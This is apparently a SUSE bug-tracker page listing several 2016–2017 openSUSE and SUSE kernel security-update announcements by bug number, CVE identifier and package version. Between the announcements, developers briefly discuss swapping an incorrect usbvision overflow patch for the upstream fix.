openSUSE-SU-2016:0301-1: An update that solves 57 vulnerabilities and has 21 fixes is now available. Category: security (important) Bug References: 814440,851610,869564,873385,906545,907818,909077,909477,911326,912202,915517,915577,917830,918333,919007,919018,919463,919596,921313,921949,922583,922936,922944,926238,926240,927780,927786,928130,929525,930399,931988,932348,933896,933904,933907,933934,935542,935705,936502,936831,937032,937033,937969,938706,940338,944296,945825,947155,949936,950998,951194,951440,951627,952384,952579,952976,953052,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075 CVE References: CVE-2014-2568,CVE-2014-8133,CVE-2014-8989,CVE-2014-9090,CVE-2014-9419,CVE-2014-9529,CVE-2014-9683,CVE-2014-9715,CVE-2014-9728,CVE-2014-9729,CVE-2014-9730,CVE-2014-9731,CVE-2015-0272,CVE-2015-0777,CVE-2015-1420,CVE-2015-1421,CVE-2015-2041,CVE-2015-2042,CVE-2015-2150,CVE-2015-2666,CVE-2015-2830,CVE-2015-2922,CVE-2015-2925,CVE-2015-3212,CVE-2015-3339,CVE-2015-3636,CVE-2015-4001,CVE-2015-4002,CVE-2015-4003,CVE-2015-4004,CVE-2015-4036,CVE-2015-4167,CVE-2015-4692,CVE-2015-4700,CVE-2015-5157,CVE-2015-5283,CVE-2015-5307,CVE-2015-5364,CVE-2015-5366,CVE-2015-5707,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7833,CVE-2015-7872,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728 Sources used: openSUSE 13.1 (src): cloop-2.639-11.22.2, crash-7.0.2-2.22.2, hdjmod-1.28-16.22.2, ipset-6.21.1-2.26.2, iscsitarget-1.4.20.3-13.22.2, kernel-debug-3.11.10-32.1, kernel-default-3.11.10-32.1, kernel-desktop-3.11.10-32.1, kernel-docs-3.11.10-32.3, kernel-ec2-3.11.10-32.1, kernel-pae-3.11.10-32.1, kernel-source-3.11.10-32.1, kernel-syms-3.11.10-32.1, kernel-trace-3.11.10-32.1, kernel-vanilla-3.11.10-32.1, kernel-xen-3.11.10-32.1, ndiswrapper-1.58-22.1, pcfclock-0.44-258.22.1, vhba-kmp-20130607-2.23.1, virtualbox-4.2.36-2.55.1, xen-4.3.4_10-56.1, xtables-addons-2.3-2.22.1
openSUSE-SU-2016:0318-1: An update that solves 19 vulnerabilities and has 18 fixes is now available. Category: security (important) Bug References: 814440,906545,912202,921949,937969,937970,938706,944296,945825,949936,950998,951627,951638,952384,952579,952976,953527,954138,954404,955224,955354,955422,956708,956934,957988,957990,958504,958510,958886,958951,959190,959399,959568,960839,961509,961739,962075 CVE References: CVE-2014-8989,CVE-2014-9529,CVE-2015-5157,CVE-2015-5307,CVE-2015-6937,CVE-2015-7550,CVE-2015-7799,CVE-2015-7885,CVE-2015-7990,CVE-2015-8104,CVE-2015-8215,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2016-0728 Sources used: openSUSE 13.2 (src): bbswitch-0.8-3.15.1, cloop-2.639-14.15.1, crash-7.0.8-15.1, hdjmod-1.28-18.16.1, ipset-6.23-15.1, kernel-debug-3.16.7-32.1, kernel-default-3.16.7-32.1, kernel-desktop-3.16.7-32.1, kernel-docs-3.16.7-32.2, kernel-ec2-3.16.7-32.1, kernel-obs-build-3.16.7-32.2, kernel-obs-qa-3.16.7-32.1, kernel-obs-qa-xen-3.16.7-32.1, kernel-pae-3.16.7-32.1, kernel-source-3.16.7-32.1, kernel-syms-3.16.7-32.1, kernel-vanilla-3.16.7-32.1, kernel-xen-3.16.7-32.1, pcfclock-0.44-260.15.1, vhba-kmp-20140629-2.15.1, virtualbox-4.3.34-37.1, xen-4.4.3_08-38.1, xtables-addons-2.6-15.1
SUSE-SU-2016:1203-1: An update that solves 41 vulnerabilities and has 49 fixes is now available. Category: security (important) Bug References: 758040,781018,879378,879381,904035,924919,934787,935123,937444,939955,940017,940413,940913,940946,941514,942082,946122,947128,948330,949298,949752,949936,950750,950998,951392,952976,954628,955308,955354,955654,955673,956375,956514,956707,956708,956709,956852,956949,957988,957990,958463,958886,958906,958912,958951,959190,959312,959399,959705,960857,961500,961509,961512,961516,961518,963276,963765,963767,963998,964201,965319,965923,966437,966693,967863,967972,967973,967974,967975,968010,968011,968012,968013,968141,968670,969307,970504,970892,970909,970911,970948,970956,970958,970970,971124,971125,971360,973570,974646,975945 CVE References: CVE-2013-7446,CVE-2015-7509,CVE-2015-7515,CVE-2015-7550,CVE-2015-7566,CVE-2015-7799,CVE-2015-8215,CVE-2015-8539,CVE-2015-8543,CVE-2015-8550,CVE-2015-8551,CVE-2015-8552,CVE-2015-8569,CVE-2015-8575,CVE-2015-8767,CVE-2015-8785,CVE-2015-8812,CVE-2015-8816,CVE-2016-0723,CVE-2016-2069,CVE-2016-2143,CVE-2016-2184,CVE-2016-2185,CVE-2016-2186,CVE-2016-2188,CVE-2016-2384,CVE-2016-2543,CVE-2016-2544,CVE-2016-2545,CVE-2016-2546,CVE-2016-2547,CVE-2016-2548,CVE-2016-2549,CVE-2016-2782,CVE-2016-2847,CVE-2016-3137,CVE-2016-3138,CVE-2016-3139,CVE-2016-3140,CVE-2016-3156,CVE-2016-3955 Sources used: SUSE OpenStack Cloud 5 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Manager Proxy 2.1 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Manager 2.1 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Linux Enterprise Server 11-SP3-LTSS (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-source-3.0.101-0.47.79.1, kernel-syms-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-ppc64-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1 SUSE Linux Enterprise Debuginfo 11-SP3 (src): kernel-bigsmp-3.0.101-0.47.79.1, kernel-default-3.0.101-0.47.79.1, kernel-ec2-3.0.101-0.47.79.1, kernel-pae-3.0.101-0.47.79.1, kernel-trace-3.0.101-0.47.79.1, kernel-xen-3.0.101-0.47.79.1
This bug has been fixed twice. Both fixes have gone upstream. My fix I applied to our kernel trees is incorrect. It has been reverted in upstream. It needs to exchanged against the correct fix from upstream. How do we do this?
(In reply to Oliver Neukum from comment #21) > This bug has been fixed twice. Both fixes have gone upstream. My fix I > applied to our kernel trees is incorrect. It has been reverted in upstream. > It needs to exchanged against the correct fix from upstream. How do we do > this? Why dropping the patch [1] from all the trees and replace it by the upstream one doesn't work? [1] I guess patches.drivers/0001-usbvision-fix-overflow-of-interfaces-array.patch
I think that's the right way to go. Just replace the fix and it will go out during the next kernel update round.
(In reply to Alexander Bergmann from comment #23) > I think that's the right way to go. Just replace the fix and it will go out > during the next kernel update round. Done.
released
SUSE-SU-2016:1937-1: An update that solves 24 vulnerabilities and has 76 fixes is now available. Category: security (important) Bug References: 662458,676471,897662,928547,944309,945345,947337,950998,951844,953048,953233,954847,956491,957805,957986,957990,958390,958463,960857,962742,962846,963762,964727,965087,966245,967640,968667,969016,970114,970506,970604,970609,970948,971049,971770,971947,972124,972933,973378,973499,973570,974165,974308,974620,974646,974692,975533,975772,975788,976739,976821,976868,977417,977582,977685,978401,978469,978527,978822,979169,979213,979347,979419,979485,979489,979521,979548,979867,979879,979922,980246,980348,980371,980706,981038,981143,981344,982282,982354,982544,982698,983143,983213,983318,983394,983721,983904,983977,984148,984456,984755,985232,985978,986362,986569,986572,986811,988215,988498,988552 CVE References: CVE-2014-9717,CVE-2014-9904,CVE-2015-7833,CVE-2015-8539,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2847,CVE-2016-3672,CVE-2016-3707,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829 Sources used: SUSE Linux Enterprise Real Time Extension 12-SP1 (src): kernel-compute-3.12.61-60.18.1, kernel-compute_debug-3.12.61-60.18.1, kernel-rt-3.12.61-60.18.1, kernel-rt_debug-3.12.61-60.18.1, kernel-source-rt-3.12.61-60.18.1, kernel-syms-rt-3.12.61-60.18.1
SUSE-SU-2016:1985-1: An update that solves 20 vulnerabilities and has 43 fixes is now available. Category: security (important) Bug References: 676471,866130,909589,936530,944309,950998,953369,954847,956491,957986,960857,961518,963762,966245,967914,968500,969149,969391,970114,971030,971126,971360,971446,971944,971947,971989,973378,974620,974646,974787,975358,976739,976868,978401,978821,978822,979213,979274,979347,979419,979548,979595,979867,979879,979915,980246,980371,980725,980788,980931,981231,981267,982532,982544,982691,983143,983213,983721,984107,984755,986362,986572,988498 CVE References: CVE-2015-7833,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2187,CVE-2016-3134,CVE-2016-3707,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-5244,CVE-2016-5829 Sources used: SUSE Linux Enterprise Real Time Extension 11-SP4 (src): kernel-rt-3.0.101.rt130-57.1, kernel-rt_trace-3.0.101.rt130-57.1, kernel-source-rt-3.0.101.rt130-57.1, kernel-syms-rt-3.0.101.rt130-57.1 SUSE Linux Enterprise Debuginfo 11-SP4 (src): kernel-rt-3.0.101.rt130-57.1, kernel-rt_debug-3.0.101.rt130-57.1, kernel-rt_trace-3.0.101.rt130-57.1
SUSE-SU-2016:2105-1: An update that solves 21 vulnerabilities and has 55 fixes is now available. Category: security (important) Bug References: 947337,950998,951844,953048,954847,956491,957990,962742,963655,963762,965087,966245,968667,970114,970506,971770,972933,973378,973499,974165,974308,974620,975531,975533,975772,975788,977417,978401,978469,978822,979074,979213,979419,979485,979489,979521,979548,979681,979867,979879,979922,980348,980363,980371,980856,980883,981038,981143,981344,981597,982282,982354,982544,982698,983143,983213,983318,983721,983904,983977,984148,984456,984755,984764,985232,985978,986362,986365,986569,986572,986573,986811,988215,988498,988552,990058 CVE References: CVE-2014-9904,CVE-2015-7833,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-3672,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829 Sources used: SUSE Linux Enterprise Workstation Extension 12-SP1 (src): kernel-default-3.12.62-60.62.1 SUSE Linux Enterprise Software Development Kit 12-SP1 (src): kernel-docs-3.12.62-60.62.3, kernel-obs-build-3.12.62-60.62.1 SUSE Linux Enterprise Server 12-SP1 (src): kernel-default-3.12.62-60.62.1, kernel-source-3.12.62-60.62.1, kernel-syms-3.12.62-60.62.1, kernel-xen-3.12.62-60.62.1 SUSE Linux Enterprise Module for Public Cloud 12 (src): kernel-ec2-3.12.62-60.62.1 SUSE Linux Enterprise Live Patching 12 (src): kgraft-patch-SLE12-SP1_Update_7-1-4.2 SUSE Linux Enterprise Desktop 12-SP1 (src): kernel-default-3.12.62-60.62.1, kernel-source-3.12.62-60.62.1, kernel-syms-3.12.62-60.62.1, kernel-xen-3.12.62-60.62.1
openSUSE-SU-2016:2184-1: An update that solves 21 vulnerabilities and has 49 fixes is now available. Category: security (important) Bug References: 947337,950998,951844,953048,954847,956491,957990,962742,963655,963762,965087,966245,968667,970114,970506,971770,972933,973378,973499,974165,974308,974620,975531,975533,975772,975788,977417,978401,978469,978822,979213,979419,979485,979489,979521,979548,979681,979867,979879,979922,980348,980363,980371,981038,981143,981344,982282,982354,982544,982698,983143,983213,983318,983721,983904,983977,984148,984456,984755,985232,985978,986362,986365,986569,986572,986811,988215,988498,988552,990058 CVE References: CVE-2014-9904,CVE-2015-7833,CVE-2015-8551,CVE-2015-8552,CVE-2015-8845,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-3672,CVE-2016-4470,CVE-2016-4482,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4805,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5828,CVE-2016-5829 Sources used: openSUSE 13.1 (src): cloop-2.639-11.32.2, crash-7.0.2-2.32.7, hdjmod-1.28-16.32.2, ipset-6.21.1-2.36.2, iscsitarget-1.4.20.3-13.32.2, kernel-debug-3.12.62-52.1, kernel-default-3.12.62-52.1, kernel-desktop-3.12.62-52.1, kernel-docs-3.12.62-52.2, kernel-ec2-3.12.62-52.1, kernel-pae-3.12.62-52.1, kernel-source-3.12.62-52.1, kernel-syms-3.12.62-52.1, kernel-trace-3.12.62-52.1, kernel-vanilla-3.12.62-52.1, kernel-xen-3.12.62-52.1, ndiswrapper-1.58-33.2, openvswitch-1.11.0-0.39.3, pcfclock-0.44-258.33.2, vhba-kmp-20130607-2.32.2, virtualbox-4.2.36-2.64.4, xen-4.3.4_10-65.3, xtables-addons-2.3-2.31.2
SUSE-SU-2016:2245-1: An update that solves 25 vulnerabilities and has 22 fixes is now available. Category: security (important) Bug References: 839104,866130,919351,944309,950998,960689,962404,963655,963762,966460,969149,970114,971126,971360,971446,971729,971944,974428,975945,978401,978821,978822,979213,979274,979548,979681,979867,979879,980371,980725,980788,980931,981267,983143,983213,983535,984107,984755,986362,986365,986445,986572,987709,988065,989152,989401,991608 CVE References: CVE-2013-4312,CVE-2015-7513,CVE-2015-7833,CVE-2016-0758,CVE-2016-1583,CVE-2016-2053,CVE-2016-2187,CVE-2016-3134,CVE-2016-3955,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4486,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5696,CVE-2016-5829,CVE-2016-6480 Sources used: SUSE OpenStack Cloud 5 (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Manager Proxy 2.1 (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Manager 2.1 (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Server 11-SP3-LTSS (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Server 11-EXTRA (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-ppc64-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Point of Sale 11-SP3 (src): kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-source-3.0.101-0.47.86.1, kernel-syms-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1 SUSE Linux Enterprise Debuginfo 11-SP3 (src): kernel-bigsmp-3.0.101-0.47.86.1, kernel-default-3.0.101-0.47.86.1, kernel-ec2-3.0.101-0.47.86.1, kernel-pae-3.0.101-0.47.86.1, kernel-trace-3.0.101-0.47.86.1, kernel-xen-3.0.101-0.47.86.1
SUSE-SU-2017:0333-1: An update that solves 46 vulnerabilities and has 31 fixes is now available. Category: security (important) Bug References: 1003077,1003925,1004517,1007944,1008645,1008831,1008833,1009443,1010150,1010467,1010501,1010507,1010711,1010716,1011482,1011685,1012422,1012832,1013038,1013531,1013542,1014746,1017710,1021258,835175,839104,863873,874145,896484,908069,914939,922947,927287,940966,950998,954984,956514,958000,960689,963053,967716,968500,969340,971360,971944,978401,978821,979213,979274,979548,979595,979879,979915,980363,980371,980725,981267,983143,983213,984755,986362,986365,986445,986572,989261,991608,991665,992566,993890,993891,994296,994436,994618,994759,995968,997059,999932 CVE References: CVE-2004-0230,CVE-2012-6704,CVE-2013-4312,CVE-2015-1350,CVE-2015-7513,CVE-2015-7833,CVE-2015-8956,CVE-2015-8962,CVE-2015-8964,CVE-2016-0823,CVE-2016-10088,CVE-2016-1583,CVE-2016-2187,CVE-2016-2189,CVE-2016-3841,CVE-2016-4470,CVE-2016-4482,CVE-2016-4485,CVE-2016-4565,CVE-2016-4569,CVE-2016-4578,CVE-2016-4580,CVE-2016-4805,CVE-2016-4913,CVE-2016-4997,CVE-2016-4998,CVE-2016-5244,CVE-2016-5829,CVE-2016-6480,CVE-2016-6828,CVE-2016-7042,CVE-2016-7097,CVE-2016-7117,CVE-2016-7425,CVE-2016-7910,CVE-2016-7911,CVE-2016-7916,CVE-2016-8399,CVE-2016-8632,CVE-2016-8633,CVE-2016-8646,CVE-2016-9555,CVE-2016-9685,CVE-2016-9756,CVE-2016-9793,CVE-2017-5551 Sources used: SUSE Linux Enterprise Server 11-SP2-LTSS (src): kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-source-3.0.101-0.7.53.1, kernel-syms-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1 SUSE Linux Enterprise Debuginfo 11-SP2 (src): kernel-default-3.0.101-0.7.53.1, kernel-ec2-3.0.101-0.7.53.1, kernel-pae-3.0.101-0.7.53.1, kernel-trace-3.0.101-0.7.53.1, kernel-xen-3.0.101-0.7.53.1